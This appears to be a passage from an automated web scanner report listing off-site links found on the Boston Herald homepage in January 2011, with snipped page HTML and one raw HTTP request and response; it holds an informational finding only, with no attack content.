<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/blogs/sports/celtics/"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/b6181f7db3_DieselTEASE.jpg" alt="Paul Pierce and Shaquille O&rsquo;Neal will play tonight in Phoenix. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/general/view/20110128goldman_sachs_triples_salaries_for_5_top_executives/format=comments&srvc=home&position=recent">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128lawrence_officer_convicted_of_rape/format=comments&srvc=home&position=recent">
...[SNIP]...
<a href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg" alt="WEB OF WOES: The highly expensive Broadway musical &lsquo;Spider-Man Turn: Off the Dark&rsquo; has been the victim of bad press, according to director Julie Taymor."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/format=comments&srvc=home&position=recent">
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-logan-mankins-on-the-pats-i-dont-see-them-trying-to-keep-me/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/"><img src="http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/07.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/8a420e_ltpSteamB012811.jpg" border="0"
width="207" height="181" caption="Ways to take the chill out of winter" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312321&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/d0a387_Padma_01272011.jpg" border="0"
width="207" height="181" caption="Complicated custody battle for Padma Lakshmi" />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.10. http://www.bostonherald.com/index.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /index.bg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /index.bg?srvc=home&tab=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
